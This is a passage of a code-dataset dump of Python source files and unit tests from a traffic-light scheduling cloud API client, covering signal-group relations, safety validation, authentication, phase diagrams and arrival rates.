to_json)\"\"\"\n assert sync_start_dict[\"min_time\"] == sync_start_dict[\"max_time\"] == 0, \\\n \"trying to load SyncStart from dictionary, but the provided dictionary is not a synchronous start!\"\n return SyncStart(from_id=sync_start_dict[\"from_id\"],\n to_id=sync_start_dict[\"to_id\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of SyncStart \"\"\"\n if not self.from_id != self.to_id:\n raise ValueError(\"ids of sync-start must be different\")\n\n\nclass Offset:\n def __init__(self, from_id: str, to_id: str, seconds: float) -> None:\n \"\"\"\n Force an offset of 'offset' seconds 
between the start (of each greenyellow interval) of\n signalgroup with id 'from_id' and the start (of each greenyellow interval) of the signalgroup with id 'to_id'.\n (the ones with id 'from_id' and 'to_id').\n :param from_id: name of signalgroup\n :param to_id: name of signalgroup\n :param seconds: The exact number of seconds forced between the start of the greenyellow interval of\n signal group 'from_id' to the greenyellow interval of signal group 'to_id'\n\n Note: This also forces the number of greenyellow intervals to be the same for both signal groups\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.from_id = str(from_id)\n self.to_id = str(to_id)\n self.seconds = float(seconds)\n\n # validate values of arguments\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"from_id\": self.from_id, \"from_start_gy\": True,\n \"to_id\": self.to_id, \"to_start_gy\": True,\n \"min_time\": self.seconds, \"max_time\": self.seconds, \"same_start_phase\": False}\n\n @staticmethod\n def from_json(offset_dict: Dict) -> Offset:\n \"\"\"Loading offset from json (expected same json structure as generated with to_json)\"\"\"\n assert offset_dict[\"min_time\"] == offset_dict[\"max_time\"], \\\n \"trying to load Offset from dictionary, but the provided dictionary is not an offset!\"\n return Offset(from_id=offset_dict[\"from_id\"],\n to_id=offset_dict[\"to_id\"],\n seconds=offset_dict[\"min_time\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of Offset \"\"\"\n if not self.from_id != self.to_id:\n raise ValueError(\"ids of offset must be different\")\n\n\nclass GreenyellowLead:\n def __init__(self, from_id: str, to_id: str, min_seconds: float, max_seconds: float) -> None:\n \"\"\"\n A greenyellow-lead is the time from signal group \"from_id\" starting its greenyellow interval to signal group \"to_id\"\n starting its greenyellow interval; for example a green-lead of at least 5 seconds and at most 10 seconds\n of sg28 with regards to sg1 means that sg28 must start its greenyellow interval\n at least 5 seconds and at most 10 seconds before SG1 starts it greenyellow interval.\n :param from_id:\n :param to_id:\n :param min_seconds: lower bound on the allowed duration of the greenyellow-lead\n :param max_seconds: upper bound on the allowed duration of the greenyellow-lead\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.from_id = str(from_id)\n self.to_id = str(to_id)\n self.min_seconds = float(min_seconds)\n self.max_seconds = float(max_seconds)\n\n # validate values of arguments\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"from_id\": self.from_id, \"from_start_gy\": True,\n \"to_id\": self.to_id, \"to_start_gy\": True,\n \"min_time\": self.min_seconds, \"max_time\": self.max_seconds,\n \"same_start_phase\": True}\n\n @staticmethod\n def from_json(json_dict: Dict) -> GreenyellowLead:\n \"\"\"Loading from json (expected same json structure as generated with to_json)\"\"\"\n return GreenyellowLead(from_id=json_dict[\"from_id\"],\n to_id=json_dict[\"to_id\"],\n min_seconds=json_dict[\"min_time\"],\n max_seconds=json_dict[\"max_time\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of GreenyellowLead \"\"\"\n if not self.from_id != self.to_id:\n raise ValueError(\"ids of GreenyellowLead must be different\")\n\n if 
not self.max_seconds >= self.min_seconds:\n raise ValueError(\"max_greenyellow_lead should exceed (or equal) min_greenyellow_lead\")\n\n\nclass GreenyellowTrail:\n def __init__(self, from_id: str, to_id: str, min_seconds: float, max_seconds: float) -> None:\n \"\"\"\n A greenyellow-trail is the time from signal group \"from_id\" ending its greenyellow interval to signal group \"to_id\"\n ending its greenyellow interval; for example a green-trail of at least 5 seconds and at most 10 seconds\n of sg1 with regards to sg28 means that sg1 must end its greenyellow interval\n at least 5 seconds and at most 10 seconds before SG28 ends it greenyellow interval.\n :param from_id:\n :param to_id:\n :param min_seconds: lower bound on the allowed duration of the greenyellow-trail\n :param max_seconds: upper bound on the allowed duration of the greenyellow-trail\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.from_id = str(from_id)\n self.to_id = str(to_id)\n self.min_seconds = float(min_seconds)\n self.max_seconds = float(max_seconds)\n\n # validate values of arguments\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"from_id\": self.from_id, \"from_start_gy\": False,\n \"to_id\": self.to_id, \"to_start_gy\": False,\n \"min_time\": self.min_seconds, \"max_time\": self.max_seconds,\n \"same_start_phase\": True}\n\n @staticmethod\n def from_json(json_dict: Dict) -> GreenyellowTrail:\n \"\"\"Loading from json (expected same json structure as generated with to_json)\"\"\"\n return GreenyellowTrail(from_id=json_dict[\"from_id\"],\n to_id=json_dict[\"to_id\"],\n min_seconds=json_dict[\"min_time\"],\n max_seconds=json_dict[\"max_time\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of GreenyellowTrail \"\"\"\n if not self.from_id != self.to_id:\n raise ValueError(\"ids of GreenyellowTrail must be different\")\n\n if not self.max_seconds >= self.min_seconds:\n raise ValueError(\"max_greenyellow_lead should exceed (or equal) min_greenyellow_trail\")\n"
},
{
"alpha_fraction": 0.7998903393745422,
"alphanum_fraction": 0.8015350699424744,
"avg_line_length": 69.15384674072266,
"blob_id": "7d8059b7afd5d6c9f9948ac1889178c8a8504377",
"content_id": "39abb2ca3dacb04c99f9108d126a09ef92f5c7d4",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1824,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 26,
"path": "/swift_cloud_py/validate_safety_restrictions/validate.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.validate_safety_restrictions.validate_bounds import validate_bounds\nfrom swift_cloud_py.validate_safety_restrictions.validate_completeness import validate_completeness\nfrom swift_cloud_py.validate_safety_restrictions.validate_conflicts import validate_conflicts\nfrom swift_cloud_py.validate_safety_restrictions.validate_fixed_orders import validate_fixed_orders\nfrom swift_cloud_py.validate_safety_restrictions.validate_other_sg_relations import validate_other_sg_relations\n\n\ndef validate_safety_restrictions(intersection: Intersection, fixed_time_schedule: FixedTimeSchedule,\n tolerance: float = 10**(-2)) -> None:\n \"\"\"\n Check if the fixed-time schedule satisfies the safety restrictions such as bounds on greenyellow times\n and bounds on red times.\n :param intersection: intersection object (this object also contains safety restrictions that a\n fixed-time schedule should satisfy)\n :param fixed_time_schedule: the schedule that we would like to validate\n :param tolerance: tolerance in seconds for violating safety restrictions\n\n This method raises a SafetyViolation-exception if the safety restrictions are not satisfied.\n \"\"\"\n validate_bounds(intersection=intersection, fts=fixed_time_schedule, tolerance=tolerance)\n validate_conflicts(intersection=intersection, fts=fixed_time_schedule, tolerance=tolerance)\n validate_other_sg_relations(intersection=intersection, fts=fixed_time_schedule, tolerance=tolerance)\n validate_completeness(intersection=intersection, fts=fixed_time_schedule)\n validate_fixed_orders(intersection=intersection, fts=fixed_time_schedule)\n"
},
{
"alpha_fraction": 0.6226993799209595,
"alphanum_fraction": 0.630014181137085,
"avg_line_length": 43.14583206176758,
"blob_id": "0d165e964441b323d680d2ffe8e2133785632579",
"content_id": "7c0ef3c3b99f1a9d3885cb892516cd8fb9d3b4d0",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4238,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 96,
"path": "/swift_cloud_py/authentication/authentication.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import logging\nfrom collections import Callable\nfrom time import time\n\nimport requests\n\nfrom swift_cloud_py.common.errors import UnauthorizedException, UnknownAuthenticationException, \\\n NoInternetConnectionException, BadRequestException\nfrom swift_cloud_py.authentication.check_internet_connection import has_internet_connection\nfrom swift_cloud_py.authentication.credentials import Credentials\n\n\nAUTHENTICATION_URL = \"https://authentication.swiftmobility.eu/authenticate\"\n\n\nclass Authentication:\n \"\"\"\n Class to retrieve authentication token (jwt token).\n \"\"\"\n _credentials = Credentials() # credentials from environment variables\n _jwt_token = None # last retrieved jwt token\n _exp = time() # time at which the token expires (in seconds starting from January 1, 1970, 00:00:00 (UTC))\n\n @classmethod\n def get_authentication_token(cls) -> str:\n \"\"\" get a valid jwt token\n return: jwt-token\n \"\"\"\n # if authentication token not yet set or almost expired\n if cls._jwt_token is None or time() + 30 > cls._exp:\n cls.update_authentication_token()\n\n return Authentication._jwt_token\n\n @classmethod\n def update_authentication_token(cls) -> None:\n \"\"\"\n update the jwt token (store the info in _jwt_token and _exp)\n :return: -\n \"\"\"\n # check if credentials are set (via environment variables)\n if cls._credentials.access_key is None:\n raise UnauthorizedException(\"Environment variable smc_api_key is not set\")\n elif cls._credentials.secret_access_key is None:\n raise UnauthorizedException(\"Environment variable smc_api_secret is not set\")\n try:\n logging.debug(\"updating authentication token\")\n r = requests.post(url=AUTHENTICATION_URL,\n json={\"accessKey\": cls._credentials.access_key,\n \"secretAccessKey\": cls._credentials.secret_access_key,\n \"accountType\": \"cloud-api\"})\n logging.debug(\"authentication token updated\")\n except requests.exceptions.ConnectionError: # no connection could be established\n if has_internet_connection():\n logging.debug(\"updating authentication token failed: unknown exception\")\n raise UnknownAuthenticationException\n else:\n logging.debug(\"updating authentication token failed: no internet!\")\n raise NoInternetConnectionException\n\n if r.status_code != 200:\n # no success; here we also catch the errors {\"error\": {\"code\": status_code, \"message\": error_message}}\n if not has_internet_connection():\n raise NoInternetConnectionException\n elif r.status_code == 401:\n raise UnauthorizedException(\"Access was denied; check if the environment variables 'smc_api_key' and \"\n \"'smc_secret_key' are correctly set. 
If still not working, send \"\n \"a mail to [email protected]\")\n elif r.status_code == 400:\n # error status_codes:\n # 400: wrong input\n # 403: not authorized\n # 500: server error\n raise BadRequestException # incorrect json format send to endpoint\n else:\n raise UnknownAuthenticationException\n else:\n # store info of new token\n json_dict = r.json()\n cls._jwt_token = json_dict[\"jwt-token\"]\n cls._exp = int(json_dict[\"exp\"])\n\n\ndef authenticate(func: Callable) -> Callable:\n \"\"\"\n wrapper function that can be used as a decorator around the methods of SwiftMobilityCloudApi; it ensures that the\n _authentication_token field of SwiftMobilityCloudApi is up-to-date.\n :param func: method of SwiftMobilityCloudApi\n :return: wrapped method\n \"\"\"\n # args and kwargs to allow for methods that have multiple named and unnamed arguments\n def wrapper(api, *args, **kwargs):\n api._authentication_token = Authentication.get_authentication_token()\n return func(api, *args, **kwargs)\n\n return wrapper\n"
},
{
"alpha_fraction": 0.5753846168518066,
"alphanum_fraction": 0.6146606206893921,
"avg_line_length": 36.33108139038086,
"blob_id": "a1f74df1ad4f97e2f724b3341e5c2ddaed672d5d",
"content_id": "d7ea2eb756ecba1ca77b463c8644ae476badea68",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5525,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 148,
"path": "/swift_cloud_py/entities/scenario/test/test_arrival_rates.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for ArrivalRates() \"\"\"\n return dict(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing ArrivalRates object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n ArrivalRates(**input_dict)\n\n # THEN no error should be raised\n\n def test_no_dict(self) -> None:\n \"\"\" Test providing no dictionary for id_to_arrival_rates\"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_arrival_rates\"] = 1\n\n with self.assertRaises(ValueError):\n # WHEN initializing the arrival rates\n ArrivalRates(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_string_values(self) -> None:\n \"\"\" Test providing no string as id in id_to_arrival_rates\"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_arrival_rates\"][1] = [1, 2] # add value (1) which is not a string\n\n with self.assertRaises(ValueError):\n # WHEN initializing the arrival rates\n ArrivalRates(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_list_for_rates(self) -> None:\n \"\"\" Test providing no list as value in id_to_arrival_rates\"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_arrival_rates\"][\"3\"] = 1 # rates is not a list\n\n with self.assertRaises(ValueError):\n # WHEN initializing the arrival rates\n ArrivalRates(**input_dict)\n\n # THEN an error should be raised\n\n def test_rate_no_number(self) -> None:\n \"\"\" Test providing no numbers for the rates \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_arrival_rates\"][\"3\"] = [1, \"3\"] # rates is not a list of numbers\n\n with self.assertRaises(ValueError):\n # WHEN initializing the arrival rates\n ArrivalRates(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestOperations(unittest.TestCase):\n\n def test_multiply(self) -> None:\n \"\"\" Test multiplying ArrivalRates \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n\n # WHEN\n arrival_rates1 *= 1.3\n\n # THEN\n self.assertListEqual(arrival_rates1.id_to_arrival_rates[\"1\"], [1000 * 1.3, 950 * 1.3])\n self.assertListEqual(arrival_rates1.id_to_arrival_rates[\"2\"], [850 * 1.3, 700 * 1.3])\n\n def test_multiply_wrong_type(self) -> None:\n \"\"\" Test multiplying ArrivalRates with non-numeric value \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n\n with self.assertRaises(ArithmeticError):\n # WHEN\n arrival_rates1 * \"string\"\n\n # THEN an exception should be raised\n\n def test_add(self) -> None:\n \"\"\" Test adding two ArrivalRates \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n arrival_rates2 = ArrivalRates(id_to_arrival_rates={\"1\": [642, 230], \"2\": [600, 355]})\n\n # WHEN\n arrival_rates1 += arrival_rates2\n\n # THEN\n self.assertListEqual(arrival_rates1.id_to_arrival_rates[\"1\"], [1000 + 642, 950 + 230])\n self.assertListEqual(arrival_rates1.id_to_arrival_rates[\"2\"], [850 + 600, 700 + 355])\n\n def 
test_add_different_ids(self) -> None:\n \"\"\" Test adding two ArrivalRates with different ids \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n arrival_rates2 = ArrivalRates(id_to_arrival_rates={\"1\": [642, 230], \"3\": [600, 355]})\n\n with self.assertRaises(ArithmeticError):\n # WHEN adding to rates with different ids\n arrival_rates1 + arrival_rates2\n\n # THEN an assertion should be raised\n\n def test_add_different_lengths(self) -> None:\n \"\"\" Test adding two ArrivalRates with different number of rates \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n arrival_rates2 = ArrivalRates(id_to_arrival_rates={\"1\": [642, 230], \"2\": [600, 355, 800]})\n\n with self.assertRaises(ArithmeticError):\n # WHEN adding to rates with different ids\n arrival_rates1 + arrival_rates2\n\n # THEN an assertion should be raised\n\n\nclass TestJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n arrival_rates = ArrivalRates(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n arrival_rates_dict = arrival_rates.to_json()\n arrival_rates_from_json = ArrivalRates.from_json(arrival_rates_dict=arrival_rates_dict)\n self.assertDictEqual(arrival_rates_dict, arrival_rates_from_json.to_json())\n"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 22.634145736694336,
"blob_id": "541c4668764092ee9a0f65604eb256b949544136",
"content_id": "3af86373a8205c248ca865444f5cc92c5e882bfe",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 969,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 41,
"path": "/swift_cloud_py/common/errors.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "class NoInternetConnectionException(Exception):\n \"\"\"\n Exception indicating no internet connection is present\n \"\"\"\n pass\n\n\nclass UnauthorizedException(Exception):\n \"\"\"\n Exception to indicate that access is denied to the cloud api.\n \"\"\"\n pass\n\n\nclass UnknownAuthenticationException(Exception):\n \"\"\"\n Exception to indicate that something went wrong in the cloud during authentication;\n possibly an unexpected error was raised in the cloud.\n \"\"\"\n pass\n\n\nclass UnknownCloudException(Exception):\n \"\"\"\n Exception to indicate that something went wrong in the cloud; possibly an unexpected error was raised in the cloud.\n \"\"\"\n pass\n\n\nclass BadRequestException(Exception):\n \"\"\"\n Exception to indicate that the input to the rest-api was incorrect.\n \"\"\"\n pass\n\n\nclass SafetyViolation(Exception):\n \"\"\"\n Exception that is raised when a fixed-time schedule does not satisfy all safety restrictions\n \"\"\"\n pass\n"
},
{
"alpha_fraction": 0.6385863423347473,
"alphanum_fraction": 0.6394754648208618,
"avg_line_length": 41.046730041503906,
"blob_id": "9bfeebbdbe58f10edc6e0e268fa4c258466ff948",
"content_id": "3e75247e48c2250d2b67eb5a96e71c7ec8fa18b3",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4499,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 107,
"path": "/swift_cloud_py/entities/control_output/phase_diagram.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using a class as typing inside the same class\nfrom typing import List\n\n\ndef sort_by_name(name: str):\n \"\"\" function needed to sort signal groups by name \"\"\"\n return len(name), name\n\n\nclass GreenYellowPhase:\n def __init__(self, signalgroup_id: str, interval_index: int) -> None:\n \"\"\"\n Refers to the (interval_index + 1)th greenyellow interval of the signal group with id signalgroup_id\n :param signalgroup_id:\n :param interval_index:\n \"\"\"\n # explicit type conversion ensures correct types are used\n self.signalgroup_id = str(signalgroup_id)\n self.interval_index = int(interval_index)\n\n def to_json(self) -> List:\n \"\"\"get json-serializable structure that can be stored as json with json.dumps()\"\"\"\n return [self.signalgroup_id, self.interval_index]\n\n @staticmethod\n def from_json(json_list: List) -> GreenYellowPhase:\n \"\"\"Loading greenyellow phase from json (expected same json structure as generated with to_json)\"\"\"\n return GreenYellowPhase(signalgroup_id=json_list[0], interval_index=json_list[1])\n\n def __str__(self):\n \"\"\"string representation of object\"\"\"\n return f\"(id={self.signalgroup_id}, index={self.interval_index})\"\n\n\nclass Phase:\n def __init__(self, greenyellow_phases: List[GreenYellowPhase]) -> None:\n \"\"\"A phase represents a number of greenyellow intervals that (may) occur at the same time\"\"\"\n self.greenyellow_phases = greenyellow_phases\n\n self._validate()\n\n def to_json(self) -> List[List]:\n \"\"\"get json-serializable structure that can be stored as json with json.dumps()\"\"\"\n return [greenyellow_phase.to_json() for greenyellow_phase in self.greenyellow_phases]\n\n @staticmethod\n def from_json(phase_list: List[List]) -> Phase:\n \"\"\"Loading phase from json (expected same json structure as generated with to_json)\"\"\"\n return Phase(greenyellow_phases=[GreenYellowPhase.from_json(greenyellow_phase)\n for greenyellow_phase in phase_list])\n\n def _validate(self):\n \"\"\" Validate arguments of Phase object\"\"\"\n error_message = \"greenyellow_phases should be a list of GreenYellowPhase-objects\"\n if not isinstance(self.greenyellow_phases, list):\n raise ValueError(error_message)\n for greenyellow_phase in self.greenyellow_phases:\n if not isinstance(greenyellow_phase, GreenYellowPhase):\n raise ValueError(error_message)\n\n def __str__(self) -> str:\n \"\"\"string representation of object\"\"\"\n string = \"[\"\n # visualize in sorted (by name) order\n greenyellow_phases = sorted(self.greenyellow_phases,\n key=lambda _greenyellow_phase: sort_by_name(_greenyellow_phase.signalgroup_id))\n for index, greenyellow_phase in enumerate(greenyellow_phases):\n if index > 0:\n string += \", \"\n string += str(greenyellow_phase)\n string += \"]\"\n return string\n\n\nclass PhaseDiagram:\n def __init__(self, phases: List[Phase]) -> None:\n \"\"\"A phasediagram is a sequence of periodically repeating Phases; a phase diagram specifies the sequence in\n which the signal groups receive a greenyellow interval. 
\"\"\"\n self.phases = phases\n\n self._validate()\n\n def to_json(self) -> List[List[List]]:\n \"\"\"get json_serializable structure that can be stored as json with json.dumps()\"\"\"\n return [phase.to_json() for phase in self.phases]\n\n @staticmethod\n def from_json(phase_lists: List[List[List]]) -> PhaseDiagram:\n \"\"\"Loading phase diagram from json (expected same json structure as generated with to_json)\"\"\"\n return PhaseDiagram(phases=[Phase.from_json(phase_list=phase_list) for phase_list in phase_lists])\n\n def _validate(self):\n \"\"\" Validate arguments of PhaseDiagram object\"\"\"\n error_message = \"phases should be a list of Phase-objects\"\n if not isinstance(self.phases, list):\n raise ValueError(error_message)\n for phase in self.phases:\n if not isinstance(phase, Phase):\n raise ValueError(error_message)\n\n def __str__(self) -> str:\n \"\"\"string representation of object\"\"\"\n string = f\"phase diagram:\"\n for phase in self.phases:\n string += \"\\n\"\n string += f\"\\t{str(phase)}\"\n return string\n"
},
{
"alpha_fraction": 0.633230447769165,
"alphanum_fraction": 0.633230447769165,
"avg_line_length": 45.28571319580078,
"blob_id": "64942b144ddad7e5f8107df5bb3b52c7342526a0",
"content_id": "17c74b68122198f9aa0d35bdbcba7307d57f7549",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3888,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 84,
"path": "/swift_cloud_py/entities/scenario/arrival_rates.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using ArrivalRates-typing inside ArrivalRates-class\n\nimport json\nfrom typing import Dict, List\n\n\nclass ArrivalRates:\n \"\"\"Arrival rates of all traffic lights\"\"\"\n def __init__(self, id_to_arrival_rates: Dict[str, List[float]]) -> None:\n \"\"\"\n :param id_to_arrival_rates: mapping of signalgroup id to a list of arrival rates for the associated traffic\n lights (in signalgroup.traffic_lights)\n return: -\n \"\"\"\n self.id_to_arrival_rates = id_to_arrival_rates\n\n # validate inputs\n self._validate()\n\n def to_json(self):\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return self.id_to_arrival_rates\n\n @staticmethod\n def from_json(arrival_rates_dict) -> ArrivalRates:\n \"\"\"Loading arrival rates from json (expected same json structure as generated with to_json)\"\"\"\n return ArrivalRates(id_to_arrival_rates=arrival_rates_dict)\n\n @staticmethod\n def from_swift_mobility_export(json_path) -> ArrivalRates:\n \"\"\"\n Loading arrival rates from json-file exported from Swift Mobility Desktop\n :param json_path: path to json file\n :return: intersection object\n \"\"\"\n with open(json_path, \"r\") as f:\n json_dict = json.load(f)\n\n return ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n\n def _validate(self) -> None:\n \"\"\" Validate input arguments of ArrivalRates; raises ValueError if validation does not pass\"\"\"\n # validate structure of id_to_arrival_rates\n error_message = \"id_to_arrival_rates should be a dictionary mapping from a signal group id (str) to \" \\\n \"a list of arrival rates (List[float])\"\n if not isinstance(self.id_to_arrival_rates, dict):\n raise ValueError(error_message)\n for _id, rates in self.id_to_arrival_rates.items():\n if not isinstance(_id, str):\n raise ValueError(error_message)\n if not isinstance(rates, list):\n raise ValueError(error_message)\n for rate in rates:\n if not isinstance(rate, (float, int)):\n raise ValueError(error_message)\n\n def __add__(self, other: ArrivalRates):\n \"\"\" add two arrival rates \"\"\"\n if not isinstance(other, ArrivalRates):\n raise ArithmeticError(\"can only add ArrivalRates object to ArrivalRates\")\n other_id_to_arrival_rates = other.id_to_arrival_rates\n\n # validate inputs\n other_ids = {_id for _id in other_id_to_arrival_rates}\n other_id_to_num_rates = {_id: len(rates) for _id, rates in other_id_to_arrival_rates.items()}\n ids = {_id for _id in self.id_to_arrival_rates}\n id_to_num_rates = {_id: len(rates) for _id, rates in self.id_to_arrival_rates.items()}\n if not ids == other_ids:\n raise ArithmeticError(\"when adding two ArrivalRates they should have the same ids\")\n if not id_to_num_rates == other_id_to_num_rates:\n raise ArithmeticError(\"when adding two ArrivalRates all rates should have equal length\")\n\n id_to_arrival_rates = \\\n {id_: [rate + other_rate for rate, other_rate in zip(rates, other_id_to_arrival_rates[id_])]\n for id_, rates in self.id_to_arrival_rates.items()}\n return ArrivalRates(id_to_arrival_rates=id_to_arrival_rates)\n\n def __mul__(self, factor: float):\n \"\"\" Multiply the arrival rates with a factor \"\"\"\n if not isinstance(factor, (float, int)):\n raise ArithmeticError(\"can only multiply ArrivalRates object with a float\")\n id_to_arrival_rates = \\\n {id_: [rate * factor for rate in rates] for id_, rates in self.id_to_arrival_rates.items()}\n return ArrivalRates(id_to_arrival_rates=id_to_arrival_rates)\n"
},
{
"alpha_fraction": 0.6376193761825562,
"alphanum_fraction": 0.6440919041633606,
"avg_line_length": 36.371681213378906,
"blob_id": "6be4592687983a582b7b54c9a948c3c6d7fd70f9",
"content_id": "b4336d472f62a6f7d054cb2c2e052c7b546de6a1",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12669,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 339,
"path": "/swift_cloud_py/entities/intersection/test/test_sg_relations.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict, SyncStart, Offset, GreenyellowLead, \\\n GreenyellowTrail\n\n\nclass TestConflictInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for Conflict() \"\"\"\n return dict(id1=\"id1\", id2=\"id2\", setup12=1, setup21=2)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing Conflict object with correct input \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n\n # WHEN\n Conflict(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to Conflict for ids \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n input_dict[\"id1\"] = 1\n input_dict[\"id2\"] = 2\n # WHEN initializing the conflict\n conflict = Conflict(**input_dict)\n\n # Should not give an error (datatype is converted to string)\n self.assertEqual(conflict.id1, \"1\")\n self.assertEqual(conflict.id2, \"2\")\n\n def test_wrong_datatype_for_numbers(self) -> None:\n \"\"\" Test giving wrong datatype to Conflict for numbers \"\"\"\n for key in [\"setup12\", \"setup21\"]:\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n input_dict[key] = 'string' # all arguments are numbers\n with self.assertRaises(ValueError):\n Conflict(**input_dict)\n\n # THEN an error should be raised\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a Conflict \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n input_dict[\"id1\"] = \"1\"\n input_dict[\"id2\"] = \"1\"\n with self.assertRaises(ValueError):\n Conflict(**input_dict)\n\n # THEN an error should be raised\n\n def test_setup_sum_negative(self) -> None:\n \"\"\" Test sum of setups being negative \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n input_dict[\"setup12\"] = 0\n input_dict[\"setup21\"] = -1\n with self.assertRaises(ValueError):\n Conflict(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestConflictJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n\n # WHEN\n conflict = Conflict(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n conflict_dict = conflict.to_json()\n conflict_from_json = Conflict.from_json(conflict_dict=conflict_dict)\n self.assertDictEqual(conflict_dict, conflict_from_json.to_json())\n\n\nclass TestSyncStartInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for SyncStart() \"\"\"\n return dict(from_id=\"1\", to_id=\"2\")\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing SyncStart object with correct input \"\"\"\n # GIVEN\n input_dict = 